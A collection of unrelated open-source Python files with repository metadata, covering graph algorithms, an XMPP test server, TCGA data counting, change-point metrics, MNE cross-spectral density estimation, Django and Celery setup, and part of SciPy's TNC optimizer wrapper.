from pandas.testing import assert_index_equal
from pandas_market_calendars.exchange_calendar_tsx import TSXExchangeCalendar, VictoriaDay
def test_time_zone():
assert TSXExchangeCalendar().tz == pytz.timezone('Canada/Eastern')
assert TSXExchangeCalendar().name == 'TSX'
def test_victoria_day():
actual = VictoriaDay.dates('2009-01-01', '2020-12-31')
expected = pd.DatetimeIndex([
pd.Timestamp("2009-05-18"),
pd.Timestamp("2010-05-24"),
pd.Timestamp("2011-05-23"),
pd.Timestamp("2012-05-21"),
pd.Timestamp("2013-05-20"),
pd.Timestamp("2014-05-19"),
pd.Timestamp("2015-05-18"),
pd.Timestamp("2016-05-23"),
pd.Timestamp("2017-05-22"),
pd.Timestamp("2018-05-21"),
pd.Timestamp("2019-05-20"),
pd.Timestamp("2020-05-18"),
])
assert_index_equal(actual, expected)
|
{
"content_hash": "f14ff4a318f414b2fa7a68c6bcdf1be6",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 90,
"avg_line_length": 29.483870967741936,
"alnum_prop": 0.6356673960612691,
"repo_name": "rsheftel/pandas_market_calendars",
"id": "00eb589c073fa4594c529f51185c94acb5e8d3cf",
"size": "914",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tsx_calendar.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "720451"
},
{
"name": "Shell",
"bytes": "155"
}
],
"symlink_target": ""
}
|
from collections import defaultdict, deque
from Queue import Queue
import unittest
class Graph:
def __init__(self, adj_list):
"""
Process the graph with the given adjacent list.
:param adj_list:
The given adjacent list. A dictionary with parent node as keys and
values as set of the adjacent nodes.
"""
self.adj_list = adj_list
def bfs(self, start):
node_q = Queue()
node_q.put(start)
visited = set()
while not node_q.empty():
node = node_q.get() # FIFO
if node not in visited:
yield node
visited.add(node)
node_q.queue.extend(self.adj_list[node] - visited)
def bfs_path(self, start, end):
node_q = Queue()
node_q.put((start, [start]))
visited = {start}
while not node_q.empty():
parent, path = node_q.get()
for child in self.adj_list[parent]:
if child not in visited:
if child == end:
yield path + [child]
else:
visited.add(child)
node_q.put((child, path + [child]))
def connected_component(self):
count = 0
visited = set()
connected_components = []
for node in self.adj_list.keys():
if node not in visited:
count += 1
bfs_nodes = list(self.bfs(node))
for node in bfs_nodes:
visited.add(node)
connected_components.append(bfs_nodes)
return count, connected_components
def dfs(self, start, adj_list, visited=None):
node_s = deque()
node_s.append(start)
if visited is None:
visited = set()
while node_s:
node = node_s.pop()
if node not in visited:
yield node
visited.add(node)
node_s.extend(adj_list[node] - visited)
def strongly_connected_component(self):
"""
Kosaraju's Algorithm.
"""
finish_time_stack = []
strongly_connected_components = []
visited = set()
def dfs_util(start):
"""
Subroutine to compute the finishing time stack. Iterative approach
is preferred to avoid exceeding recursion depth.
"""
node_s = deque()
node_s.append(start)
pop_set = set() # for memoization of the processed elements.
while node_s:
node = node_s[-1]
visit_next = None # for boundary condition.
if node not in visited:
visited.add(node)
visit_next = self.adj_list[node] - visited
node_s.extend(visit_next)
if not visit_next:
node = node_s.pop()
if node not in pop_set:
finish_time_stack.append(node)
pop_set.add(node)
# d.keys() creates a static list of the dictionary keys.
# Otherwise, we get a pretty neat exception while processing
# large graphs.
# "RuntimeError: dictionary changed size during iteration".
for node in self.adj_list.keys():
if node not in visited:
dfs_util(node)
# Graph transpose can also be done while reading the file for optimisation.
adj_list_invert = defaultdict(set)
for head, tail in self.adj_list.items():
for node in tail:
adj_list_invert[node].add(head)
visited = set()
while finish_time_stack:
start = finish_time_stack.pop()
if start not in visited:
newly_visited = set(self.dfs(start, adj_list_invert, visited))
visited.update(newly_visited)
strongly_connected_components.append(newly_visited)
return strongly_connected_components
class GraphTest(unittest.TestCase):
def setUp(self):
self.graph = Graph({'A': set(['B', 'C']),
'B': set(['A', 'D', 'E']),
'C': set(['A', 'F']),
'D': set(['B']),
'E': set(['B', 'F', 'G']),
'F': set(['C', 'E']),
'G': set()})
def test_bfs(self):
self.assertEqual(list(self.graph.bfs('A')),
['A', 'C', 'B', 'F', 'E', 'D', 'G'])
def test_bfs_path(self):
self.assertEqual(list(self.graph.bfs_path('A', 'E')),
[['A', 'B', 'E'], ['A', 'C', 'F', 'E']])
def test_connected_component(self):
self.graph = Graph({'A': set(['B', 'C']),
'B': set(['C', 'A']),
'C': set(['A', 'B']),
'D': set(),
'E': set(['F']),
'F': set(['E'])})
self.assertEqual(self.graph.connected_component(),
(3, [['A', 'C', 'B'],
['E', 'F'],
['D']]))
def test_dfs(self):
self.graph = Graph({'A': set(['B']),
'B': set(['C', 'D']),
'C': set(['A']),
'D': set('E'),
'E': set()})
self.assertEqual(list(self.graph.dfs('A', self.graph.adj_list)),
['A', 'B', 'D', 'E', 'C'])
def test_strongly_connected_components(self):
self.graph = Graph({1: set([2]),
2: set([3,4,6]),
3: set([1,4]),
4: set([5]),
5: set([4]),
6: set([5,7]),
7: set([6,8]),
8: set([5,7])})
self.assertEqual(self.graph.strongly_connected_component(),
[{1,3,2}, {6,7,8}, {5,4}])
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "ba78cd47f59ce338f2dcaca15d8c3da1",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 83,
"avg_line_length": 34.97752808988764,
"alnum_prop": 0.4376806938644395,
"repo_name": "gzc/CLRS",
"id": "4c57a3d74da4ac539c234a20086b9f1f641959fd",
"size": "6226",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "C22-Elementary-Graph-Algorithms/elementary_graph_algo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "29845"
},
{
"name": "C++",
"bytes": "153168"
},
{
"name": "Makefile",
"bytes": "2947"
},
{
"name": "Python",
"bytes": "64808"
}
],
"symlink_target": ""
}
|
from twisted.python import log
from twisted.internet import defer
from twisted.words.protocols.jabber import error, ijabber, jstrports, xmlstream
from twisted.words.protocols.jabber import component
class XmppTestServerFactory(xmlstream.XmlStreamServerFactory):
def __init__(self, starter):
def authenticatorFactory():
return component.ListenComponentAuthenticator('test')
xmlstream.XmlStreamServerFactory.__init__(self, authenticatorFactory)
self.addBootstrap(xmlstream.STREAM_CONNECTED_EVENT,
self.onConnectionMade)
self.addBootstrap(xmlstream.STREAM_AUTHD_EVENT,
self.onAuthenticated)
self.cstate = 0
self.component = None
self.listeners = []
self.queue = []
self.starter = starter
def onConnectionMade(self, xs):
log.msg("New connection: %r" % (xs,))
assert self.cstate == 0
self.cstate = 1
def logDataIn(buf):
log.msg("RECV (tf): %r" % (buf,))
def logDataOut(buf):
log.msg("SEND (tf): %r" % (buf,))
xs.rawDataInFn = logDataIn
xs.rawDataOutFn = logDataOut
xs.addObserver(xmlstream.STREAM_ERROR_EVENT, self.onError)
def onAuthenticated(self, xs):
assert self.cstate == 1
self.cstate = 2
destination = xs.thisEntity.host
self.component = xs
xs.addObserver(xmlstream.STREAM_END_EVENT, self.onConnectionLost, 0,
destination, xs)
xs.addObserver('/*', self.onStanza)
self.starter(self)
def onError(self, reason):
log.err(reason, "Stream Error")
def onConnectionLost(self, destination, xs, reason):
assert self.cstate > 0
xs.removeObserver('/*', self.onStanza)
self.component = None
self.cstate = 0
def onStanza(self, stanza):
while self.listeners and self.queue:
listener = self.listeners.pop(0)
queued_stanza = self.queue.pop(0)
listener.callback(queued_stanza)
if self.listeners:
listener = self.listeners.pop(0)
listener.callback(stanza)
else:
self.queue.append(stanza)
def stanzaReset(self):
self.listeners = []
self.queue = []
def stanzaRecv(self):
d = defer.Deferred()
if self.queue:
d.callback(self.queue.pop(0))
else:
self.listeners.append(d)
return d
def stanzaSend(self, stanza):
self.component.send(stanza)
|
{
"content_hash": "a310654ab6441982cb1dbc5b0ca24169",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 79,
"avg_line_length": 29.772727272727273,
"alnum_prop": 0.5946564885496183,
"repo_name": "ojab/bnw",
"id": "654195351a9db65e409c1ded9b130bd6ffd1a0b6",
"size": "2620",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bnw/tests/test_server/xmpp_tester.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "9310"
},
{
"name": "HTML",
"bytes": "29045"
},
{
"name": "JavaScript",
"bytes": "52028"
},
{
"name": "Python",
"bytes": "238111"
},
{
"name": "Shell",
"bytes": "2934"
}
],
"symlink_target": ""
}
|
'''
Created on Jun 14, 2013
class to iterate through the TCGA directories and report on counts per cancer per platform
@author: michael
'''
from datetime import datetime
import sys
import parse_tcga
from technology_type_factory import technology_type_factory
sampleheader = ['cnv', 'rna', 'meth', 'mirna', 'total']
participantheader = ['clinical', 'cnv', 'mutations', 'rna', 'meth', 'mirna', 'total']
platform2header = {'bcgsc.ca/illuminaga_rnaseq/rnaseq/': 'rna',
'bcgsc.ca/illuminaga_mirnaseq/mirnaseq/': 'mirna',
'bcgsc.ca/illuminahiseq_rnaseq/rnaseq/': 'rna',
'bcgsc.ca/illuminahiseq_mirnaseq/mirnaseq/': 'mirna',
'broad.mit.edu/genome_wide_snp_6/snp/': 'cnv',
'genome.wustl.edu/genome_wide_snp_6/snp/': 'cnv',
'broad.mit.edu/ht_hg-u133a/transcriptome/': 'rna',
'jhu-usc.edu/humanmethylation27/methylation/': 'meth',
'jhu-usc.edu/humanmethylation450/methylation/': 'meth',
'mdanderson.org/mda_rppa_core/protein_exp/': 'protein',
'nationwidechildrens.org/microsat_i/fragment_analysis/': 'microsat',
'unc.edu/agilentg4502a_07_1/transcriptome/': 'rna',
'unc.edu/agilentg4502a_07_2/transcriptome/': 'rna',
'unc.edu/agilentg4502a_07_3/transcriptome/': 'rna',
'unc.edu/illuminaga_rnaseq/rnaseq/': 'rna',
'unc.edu/illuminahiseq_rnaseq/rnaseq/': 'rna',
'unc.edu/illuminahiseq_rnaseqv2/rnaseqv2/': 'rna',
'unc.edu/h-mirna_8x15k/mirna/': 'mirna',
'clinical/': 'clinical'}
def addone(platform2count, header):
platform2count.setdefault(header, 0)
platform2count[header] += 1
def run(argv):
print datetime.now(), "starting... (%s)" % (argv)
_, tumorTypes, _ = parse_tcga.initialize(argv)
config = parse_tcga.config
if ['all'] == tumorTypes:
tumorTypes = config.get('main', 'cancerDirNames').split(',')
techTypeFactory = technology_type_factory(config)
platforms = techTypeFactory.getTechnologyTypes()
tumor2platforms2barcodes = {}
for tumor in tumorTypes:
platforms2barcodes = tumor2platforms2barcodes.setdefault(tumor, {})
for platform in platforms:
techType = techTypeFactory.getTechnologyType(config, platform)
numSamples, filename2sampleInfo, _, _ = parse_tcga.parseFileInfo(techType, tumor)
if 0 == numSamples:
print 'did not find any samples for %s' % tumor
continue
platforms2barcodes[platform] = set([info[0][0] for info in filename2sampleInfo.itervalues()])
# put together the return values
platform2tumors = {}
tumor2patient2header2counts = {}
tumor2sample2header2counts = {}
for tumor, platforms2barcodes in tumor2platforms2barcodes.iteritems():
for platform, barcodes in platforms2barcodes.iteritems():
platform2tumors.setdefault(platform, set()).add(tumor)
header = platform2header[platform]
if not header:
raise ValueError('%s was not mapped to a header' % (platform))
[addone(tumor2patient2header2counts.setdefault(tumor, {}).setdefault(barcode[:12], {}), header) for barcode in barcodes]
[addone(tumor2sample2header2counts.setdefault(tumor, {}).setdefault(barcode[:16], {}), header) for barcode in barcodes if 15 < len(barcode)]
print '%s' % '\n'.join([(platform + ': ' + str(tumors)) for (platform, tumors) in platform2tumors.iteritems()])
print datetime.now(), "finished"
return platform2tumors, tumor2patient2header2counts, tumor2sample2header2counts
if __name__ == '__main__':
run(sys.argv)
sys.exit(0)
|
{
"content_hash": "e2ab0d899d8018f489b25c2a8a662b6c",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 152,
"avg_line_length": 45.61038961038961,
"alnum_prop": 0.6862186788154897,
"repo_name": "cancerregulome/gidget",
"id": "2c19f64b484b53cd6bb46c81322f050306116904",
"size": "3512",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "commands/feature_matrix_construction/main/count_tcga.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "83724"
},
{
"name": "Python",
"bytes": "2253496"
},
{
"name": "Shell",
"bytes": "457404"
}
],
"symlink_target": ""
}
|
"""Mean time error."""
import numpy as np
from scipy.spatial.distance import cdist
from ruptures.metrics.sanity_check import sanity_check
def meantime(true_bkps, my_bkps):
"""For each computed changepoint, the mean time error is the average number
of points to the closest true changepoint. Not a symetric funtion.
Args:
true_bkps (list): list of the last index of each regime (true
partition).
my_bkps (list): list of the last index of each regime (computed
partition)
Returns:
float: mean time error.
"""
sanity_check(true_bkps, my_bkps)
true_bkps_arr = np.array(true_bkps[:-1]).reshape(-1, 1)
my_bkps_arr = np.array(my_bkps[:-1]).reshape(-1, 1)
pw_dist = cdist(true_bkps_arr, my_bkps_arr)
dist_from_true = pw_dist.min(axis=0)
assert len(dist_from_true) == len(my_bkps) - 1
return dist_from_true.mean()
|
{
"content_hash": "ace9621268211664287f3ef896fcbc90",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 79,
"avg_line_length": 31.310344827586206,
"alnum_prop": 0.6530837004405287,
"repo_name": "deepcharles/ruptures",
"id": "9bbd44931ad964bb839a72f46dc21be66f6d941e",
"size": "908",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/ruptures/metrics/timeerror.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "11503"
},
{
"name": "Cython",
"bytes": "5301"
},
{
"name": "Python",
"bytes": "109410"
}
],
"symlink_target": ""
}
|
import warnings
import copy as cp
import numpy as np
from scipy.fftpack import fftfreq
from ..io.pick import pick_types
from ..utils import logger, verbose
from ..time_frequency.multitaper import (dpss_windows, _mt_spectra,
_csd_from_mt, _psd_from_mt_adaptive)
class CrossSpectralDensity(object):
"""Cross-spectral density
Parameters
----------
data : array of shape (n_channels, n_channels)
The cross-spectral density matrix.
ch_names : list of string
List of channels' names.
projs :
List of projectors used in CSD calculation.
bads :
List of bad channels.
frequencies : float | list of float
Frequency or frequencies for which the CSD matrix was calculated. If a
list is passed, data is a sum across CSD matrices for all frequencies.
n_fft : int
Length of the FFT used when calculating the CSD matrix.
"""
def __init__(self, data, ch_names, projs, bads, frequencies, n_fft):
self.data = data
self.dim = len(data)
self.ch_names = cp.deepcopy(ch_names)
self.projs = cp.deepcopy(projs)
self.bads = cp.deepcopy(bads)
self.frequencies = np.atleast_1d(np.copy(frequencies))
self.n_fft = n_fft
def __repr__(self):
s = 'frequencies : %s' % self.frequencies
s += ', size : %s x %s' % self.data.shape
s += ', data : %s' % self.data
return '<CrossSpectralDensity | %s>' % s
@verbose
def compute_epochs_csd(epochs, mode='multitaper', fmin=0, fmax=np.inf,
fsum=True, tmin=None, tmax=None, n_fft=None,
mt_bandwidth=None, mt_adaptive=False, mt_low_bias=True,
projs=None, verbose=None):
"""Estimate cross-spectral density from epochs
Note: Baseline correction should be used when creating the Epochs.
Otherwise the computed cross-spectral density will be inaccurate.
Note: Results are scaled by sampling frequency for compatibility with
Matlab.
Parameters
----------
epochs : instance of Epochs
The epochs.
mode : str
Spectrum estimation mode can be either: 'multitaper' or 'fourier'.
fmin : float
Minimum frequency of interest.
fmax : float | np.inf
Maximum frequency of interest.
fsum : bool
Sum CSD values for the frequencies of interest. Summing is performed
instead of averaging so that accumulated power is comparable to power
in the time domain. If True, a single CSD matrix will be returned. If
False, the output will be a list of CSD matrices.
tmin : float | None
Minimum time instant to consider. If None start at first sample.
tmax : float | None
Maximum time instant to consider. If None end at last sample.
n_fft : int | None
Length of the FFT. If None the exact number of samples between tmin and
tmax will be used.
mt_bandwidth : float | None
The bandwidth of the multitaper windowing function in Hz.
Only used in 'multitaper' mode.
mt_adaptive : bool
Use adaptive weights to combine the tapered spectra into PSD.
Only used in 'multitaper' mode.
mt_low_bias : bool
Only use tapers with more than 90% spectral concentration within
bandwidth. Only used in 'multitaper' mode.
projs : list of Projection | None
List of projectors to use in CSD calculation, or None to indicate that
the projectors from the epochs should be inherited.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
csd : instance of CrossSpectralDensity
The computed cross-spectral density.
"""
# Portions of this code adapted from mne/connectivity/spectral.py
# Check correctness of input data and parameters
if fmax < fmin:
raise ValueError('fmax must be larger than fmin')
tstep = epochs.times[1] - epochs.times[0]
if tmin is not None and tmin < epochs.times[0] - tstep:
raise ValueError('tmin should be larger than the smallest data time '
'point')
if tmax is not None and tmax > epochs.times[-1] + tstep:
raise ValueError('tmax should be smaller than the largest data time '
'point')
if tmax is not None and tmin is not None:
if tmax < tmin:
raise ValueError('tmax must be larger than tmin')
if epochs.baseline is None:
warnings.warn('Epochs are not baseline corrected, cross-spectral '
'density may be inaccurate')
if projs is None:
projs = cp.deepcopy(epochs.info['projs'])
else:
projs = cp.deepcopy(projs)
picks_meeg = pick_types(epochs[0].info, meg=True, eeg=True, eog=False,
ref_meg=False, exclude='bads')
ch_names = [epochs.ch_names[k] for k in picks_meeg]
# Preparing time window slice
tstart, tend = None, None
if tmin is not None:
tstart = np.where(epochs.times >= tmin)[0][0]
if tmax is not None:
tend = np.where(epochs.times <= tmax)[0][-1] + 1
tslice = slice(tstart, tend, None)
n_times = len(epochs.times[tslice])
n_fft = n_times if n_fft is None else n_fft
# Preparing frequencies of interest
sfreq = epochs.info['sfreq']
orig_frequencies = fftfreq(n_fft, 1. / sfreq)
freq_mask = (orig_frequencies > fmin) & (orig_frequencies < fmax)
frequencies = orig_frequencies[freq_mask]
n_freqs = len(frequencies)
if n_freqs == 0:
raise ValueError('No discrete fourier transform results within '
'the given frequency window. Please widen either '
'the frequency window or the time window')
# Preparing for computing CSD
logger.info('Computing cross-spectral density from epochs...')
if mode == 'multitaper':
# Compute standardized half-bandwidth
if mt_bandwidth is not None:
half_nbw = float(mt_bandwidth) * n_times / (2 * sfreq)
else:
half_nbw = 2
# Compute DPSS windows
n_tapers_max = int(2 * half_nbw)
window_fun, eigvals = dpss_windows(n_times, half_nbw, n_tapers_max,
low_bias=mt_low_bias)
n_tapers = len(eigvals)
logger.info(' using multitaper spectrum estimation with %d DPSS '
'windows' % n_tapers)
if mt_adaptive and len(eigvals) < 3:
warnings.warn('Not adaptively combining the spectral estimators '
'due to a low number of tapers.')
mt_adaptive = False
elif mode == 'fourier':
logger.info(' using FFT with a Hanning window to estimate spectra')
window_fun = np.hanning(n_times)
mt_adaptive = False
eigvals = 1.
n_tapers = None
else:
raise ValueError('Mode has an invalid value.')
csds_mean = np.zeros((len(ch_names), len(ch_names), n_freqs),
dtype=complex)
# Picking frequencies of interest
freq_mask_mt = freq_mask[orig_frequencies >= 0]
# Compute CSD for each epoch
n_epochs = 0
for epoch in epochs:
epoch = epoch[picks_meeg][:, tslice]
# Calculating Fourier transform using multitaper module
x_mt, _ = _mt_spectra(epoch, window_fun, sfreq, n_fft)
if mt_adaptive:
# Compute adaptive weights
_, weights = _psd_from_mt_adaptive(x_mt, eigvals, freq_mask,
return_weights=True)
# Tiling weights so that we can easily use _csd_from_mt()
weights = weights[:, np.newaxis, :, :]
weights = np.tile(weights, [1, x_mt.shape[0], 1, 1])
else:
# Do not use adaptive weights
if mode == 'multitaper':
weights = np.sqrt(eigvals)[np.newaxis, np.newaxis, :,
np.newaxis]
else:
# Hack so we can sum over axis=-2
weights = np.array([1.])[:, None, None, None]
x_mt = x_mt[:, :, freq_mask_mt]
# Calculating CSD
# Tiling x_mt so that we can easily use _csd_from_mt()
x_mt = x_mt[:, np.newaxis, :, :]
x_mt = np.tile(x_mt, [1, x_mt.shape[0], 1, 1])
y_mt = np.transpose(x_mt, axes=[1, 0, 2, 3])
weights_y = np.transpose(weights, axes=[1, 0, 2, 3])
csds_epoch = _csd_from_mt(x_mt, y_mt, weights, weights_y)
# Scaling by number of samples and compensating for loss of power due
# to windowing (see section 11.5.2 in Bendat & Piersol).
if mode == 'fourier':
csds_epoch /= n_times
csds_epoch *= 8 / 3.
# Scaling by sampling frequency for compatibility with Matlab
csds_epoch /= sfreq
csds_mean += csds_epoch
n_epochs += 1
csds_mean /= n_epochs
logger.info('[done]')
# Summing over frequencies of interest or returning a list of separate CSD
# matrices for each frequency
if fsum is True:
csd_mean_fsum = np.sum(csds_mean, 2)
csd = CrossSpectralDensity(csd_mean_fsum, ch_names, projs,
epochs.info['bads'],
frequencies=frequencies, n_fft=n_fft)
return csd
else:
csds = []
for i in range(n_freqs):
csds.append(CrossSpectralDensity(csds_mean[:, :, i], ch_names,
projs, epochs.info['bads'],
frequencies=frequencies[i],
n_fft=n_fft))
return csds
|
{
"content_hash": "fd39f69b067a07bc2071886d990e24c7",
"timestamp": "",
"source": "github",
"line_count": 254,
"max_line_length": 79,
"avg_line_length": 38.838582677165356,
"alnum_prop": 0.5854029396857577,
"repo_name": "dimkal/mne-python",
"id": "e147da2858248eb5dd6d0e1995fbd00c9a1e4332",
"size": "9936",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "mne/time_frequency/csd.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "3117"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "4242577"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
}
|
from .engine import (
Engine,
)
|
{
"content_hash": "f0e71f4d999c04d933634b637f5277ee",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 21,
"avg_line_length": 12,
"alnum_prop": 0.6111111111111112,
"repo_name": "rsk-mind/rsk-mind-framework",
"id": "e8861b4603cf4f09b84091609a92a56d7e3a6930",
"size": "36",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rsk_mind/engine/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "83888"
}
],
"symlink_target": ""
}
|
from setuptools import setup
setup(name = 'confit',
version = '0.0.0',
install_requires = [],
description = 'An object-oriented DSL for system automation',
maintainer = 'Jason Dusek',
maintainer_email = 'jason.dusek@gmail.com',
url = 'https://github.com/solidsnack/confit',
packages = ['confit'],
classifiers = ['Environment :: Console',
'Intended Audience :: Developers',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: System',
'Topic :: System :: Systems Administration',
'Topic :: Software Development',
'Development Status :: 4 - Beta'])
|
{
"content_hash": "e9be574566f6b59f2a0b966034c864f5",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 72,
"avg_line_length": 45.6,
"alnum_prop": 0.46271929824561403,
"repo_name": "solidsnack/confit",
"id": "dc5077ff7ce240117ffd1846d4c45a845b15bac2",
"size": "935",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "169"
},
{
"name": "Python",
"bytes": "20949"
}
],
"symlink_target": ""
}
|
import factory
from django.contrib.gis import geos
class PointFactory(factory.django.DjangoModelFactory):
title = factory.Sequence(lambda n: 'point-{}'.format(n))
description = 'description'
geom = geos.fromstr('POINT (0 0)')
class Meta:
model = 'points.Point'
|
{
"content_hash": "342f723ddd8fdc083fbb5a6ab6022b77",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 60,
"avg_line_length": 26.181818181818183,
"alnum_prop": 0.6909722222222222,
"repo_name": "KlubJagiellonski/poznaj-app-backend",
"id": "1712a8375844d70fc87ee3f9a34ba7caba78444e",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "poznaj/points/tests/factories.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1597"
},
{
"name": "Dockerfile",
"bytes": "533"
},
{
"name": "HTML",
"bytes": "1064"
},
{
"name": "Makefile",
"bytes": "1020"
},
{
"name": "Python",
"bytes": "41829"
},
{
"name": "Shell",
"bytes": "684"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from .models import Person, SantaList
admin.site.register(Person)
class SantaListAdmin(admin.ModelAdmin):
list_display = ['name', 'organiser_email']
ordering = ['name']
readonly_fields = ['slug', 'secure_hash_signup', 'secure_hash_review']
admin.site.register(SantaList, SantaListAdmin)
|
{
"content_hash": "66b479929f6e720772d7dabe0df4f820",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 74,
"avg_line_length": 21.25,
"alnum_prop": 0.7264705882352941,
"repo_name": "TheUKDave/secret_santa",
"id": "a4d1de56f06862f62fdff579682e4d3fe5dd09c3",
"size": "340",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "santa/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "403"
},
{
"name": "HTML",
"bytes": "4726"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Python",
"bytes": "25618"
},
{
"name": "Shell",
"bytes": "1243"
}
],
"symlink_target": ""
}
|
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "webquills.settings")
app = Celery("webquills")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
|
{
"content_hash": "014ca5e5a01e12b8520318daea866d20",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 69,
"avg_line_length": 33.588235294117645,
"alnum_prop": 0.7723292469352014,
"repo_name": "veselosky/webquills",
"id": "e602b3539d98452801295994c847b46e7b3ccaf6",
"size": "571",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "webquills/celery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21709"
},
{
"name": "HTML",
"bytes": "12296"
},
{
"name": "Python",
"bytes": "135964"
},
{
"name": "Shell",
"bytes": "3242"
}
],
"symlink_target": ""
}
|
"""
TNC: A python interface to the TNC non-linear optimizer
TNC is a non-linear optimizer. To use it, you must provide a function to
minimize. The function must take one argument: the list of coordinates where to
evaluate the function; and it must return either a tuple, whose first element is the
value of the function, and whose second argument is the gradient of the function
(as a list of values); or None, to abort the minimization.
"""
from __future__ import division, print_function, absolute_import
from scipy.optimize import moduleTNC, approx_fprime
from .optimize import MemoizeJac, Result, _check_unknown_options
from numpy import asarray, inf, array
__all__ = ['fmin_tnc']
MSG_NONE = 0 # No messages
MSG_ITER = 1 # One line per iteration
MSG_INFO = 2 # Informational messages
MSG_VERS = 4 # Version info
MSG_EXIT = 8 # Exit reasons
MSG_ALL = MSG_ITER + MSG_INFO + MSG_VERS + MSG_EXIT
MSGS = {
MSG_NONE : "No messages",
MSG_ITER : "One line per iteration",
MSG_INFO : "Informational messages",
MSG_VERS : "Version info",
MSG_EXIT : "Exit reasons",
MSG_ALL : "All messages"
}
INFEASIBLE = -1 # Infeasible (low > up)
LOCALMINIMUM = 0 # Local minima reach (|pg| ~= 0)
FCONVERGED = 1 # Converged (|f_n-f_(n-1)| ~= 0)
XCONVERGED = 2 # Converged (|x_n-x_(n-1)| ~= 0)
MAXFUN = 3 # Max. number of function evaluations reach
LSFAIL = 4 # Linear search failed
CONSTANT = 5 # All lower bounds are equal to the upper bounds
NOPROGRESS = 6 # Unable to progress
USERABORT = 7 # User requested end of minimization
RCSTRINGS = {
INFEASIBLE : "Infeasible (low > up)",
LOCALMINIMUM : "Local minima reach (|pg| ~= 0)",
FCONVERGED : "Converged (|f_n-f_(n-1)| ~= 0)",
XCONVERGED : "Converged (|x_n-x_(n-1)| ~= 0)",
MAXFUN : "Max. number of function evaluations reach",
LSFAIL : "Linear search failed",
CONSTANT : "All lower bounds are equal to the upper bounds",
NOPROGRESS : "Unable to progress",
USERABORT : "User requested end of minimization"
}
# Changes to interface made by Travis Oliphant, Apr. 2004 for inclusion in
# SciPy
def fmin_tnc(func, x0, fprime=None, args=(), approx_grad=0,
bounds=None, epsilon=1e-8, scale=None, offset=None,
messages=MSG_ALL, maxCGit=-1, maxfun=None, eta=-1,
stepmx=0, accuracy=0, fmin=0, ftol=-1, xtol=-1, pgtol=-1,
rescale=-1, disp=None, callback=None):
"""
Minimize a function with variables subject to bounds, using
gradient information in a truncated Newton algorithm. This
method wraps a C implementation of the algorithm.
Parameters
----------
func : callable ``func(x, *args)``
Function to minimize. Must do one of:
1. Return f and g, where f is the value of the function and g its
gradient (a list of floats).
2. Return the function value but supply gradient function
seperately as `fprime`.
3. Return the function value and set ``approx_grad=True``.
If the function returns None, the minimization
is aborted.
x0 : list of floats
Initial estimate of minimum.
fprime : callable ``fprime(x, *args)``
Gradient of `func`. If None, then either `func` must return the
function value and the gradient (``f,g = func(x, *args)``)
or `approx_grad` must be True.
args : tuple
Arguments to pass to function.
approx_grad : bool
If true, approximate the gradient numerically.
bounds : list
(min, max) pairs for each element in x0, defining the
bounds on that parameter. Use None or +/-inf for one of
min or max when there is no bound in that direction.
epsilon : float
Used if approx_grad is True. The stepsize in a finite
difference approximation for fprime.
scale : list of floats
Scaling factors to apply to each variable. If None, the
factors are up-low for interval bounded variables and
1+|x] fo the others. Defaults to None
offset : float
Value to substract from each variable. If None, the
offsets are (up+low)/2 for interval bounded variables
and x for the others.
messages :
Bit mask used to select messages display during
minimization values defined in the MSGS dict. Defaults to
MGS_ALL.
disp : int
Integer interface to messages. 0 = no message, 5 = all messages
maxCGit : int
Maximum number of hessian*vector evaluations per main
iteration. If maxCGit == 0, the direction chosen is
-gradient if maxCGit < 0, maxCGit is set to
max(1,min(50,n/2)). Defaults to -1.
